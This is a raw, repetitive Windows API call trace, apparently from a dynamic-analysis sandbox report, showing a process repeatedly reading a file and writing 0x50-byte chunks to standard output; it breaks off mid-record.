[0216.898] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] GetFileType (hFile=0x50) returned 0x1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] GetFileType (hFile=0x50) returned 0x1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] GetFileType (hFile=0x50) returned 0x1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] GetFileType (hFile=0x50) returned 0x1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] GetFileType (hFile=0x50) returned 0x1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.943] GetFileType (hFile=0x50) returned 0x1 [0216.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.943] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.943] GetFileType (hFile=0x50) returned 0x1 [0216.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.943] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.943] GetFileType (hFile=0x50) returned 0x1 [0216.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.943] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.943] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.943] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.944] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] GetFileType (hFile=0x50) returned 0x1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] GetFileType (hFile=0x50) returned 0x1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] GetFileType (hFile=0x50) returned 0x1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] GetFileType (hFile=0x50) returned 0x1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] GetFileType (hFile=0x50) returned 0x1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] GetFileType (hFile=0x50) returned 0x1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] GetFileType (hFile=0x50) returned 0x1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] GetFileType (hFile=0x50) returned 0x1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.945] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.945] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] GetFileType (hFile=0x50) returned 0x1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] GetFileType (hFile=0x50) returned 0x1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] GetFileType (hFile=0x50) returned 0x1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] GetFileType (hFile=0x50) returned 0x1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] GetFileType (hFile=0x50) returned 0x1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] GetFileType (hFile=0x50) returned 0x1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] GetFileType (hFile=0x50) returned 0x1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] GetFileType (hFile=0x50) returned 0x1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.946] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.946] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.947] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.947] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] GetFileType (hFile=0x50) returned 0x1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] GetFileType (hFile=0x50) returned 0x1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] GetFileType (hFile=0x50) returned 0x1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] GetFileType (hFile=0x50) returned 0x1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] GetFileType (hFile=0x50) returned 0x1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] GetFileType (hFile=0x50) returned 0x1 [0216.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.947] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] GetFileType (hFile=0x50) returned 0x1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] GetFileType (hFile=0x50) returned 0x1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.948] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.948] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] GetFileType (hFile=0x50) returned 0x1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] GetFileType (hFile=0x50) returned 0x1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] GetFileType (hFile=0x50) returned 0x1 [0216.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.948] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] GetFileType (hFile=0x50) returned 0x1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] GetFileType (hFile=0x50) returned 0x1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] GetFileType (hFile=0x50) returned 0x1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] GetFileType (hFile=0x50) returned 0x1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] GetFileType (hFile=0x50) returned 0x1 [0216.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.949] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.949] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.949] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.950] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.950] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] GetFileType (hFile=0x50) returned 0x1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] GetFileType (hFile=0x50) returned 0x1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] GetFileType (hFile=0x50) returned 0x1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] GetFileType (hFile=0x50) returned 0x1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] GetFileType (hFile=0x50) returned 0x1 [0216.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.950] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] GetFileType (hFile=0x50) returned 0x1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] GetFileType (hFile=0x50) returned 0x1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] GetFileType (hFile=0x50) returned 0x1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.951] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.951] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] GetFileType (hFile=0x50) returned 0x1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] GetFileType (hFile=0x50) returned 0x1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.951] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] GetFileType (hFile=0x50) returned 0x1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] GetFileType (hFile=0x50) returned 0x1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] GetFileType (hFile=0x50) returned 0x1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] GetFileType (hFile=0x50) returned 0x1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] GetFileType (hFile=0x50) returned 0x1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.952] GetFileType (hFile=0x50) returned 0x1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.953] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.953] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.953] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.953] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] GetFileType (hFile=0x50) returned 0x1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] GetFileType (hFile=0x50) returned 0x1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] GetFileType (hFile=0x50) returned 0x1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] 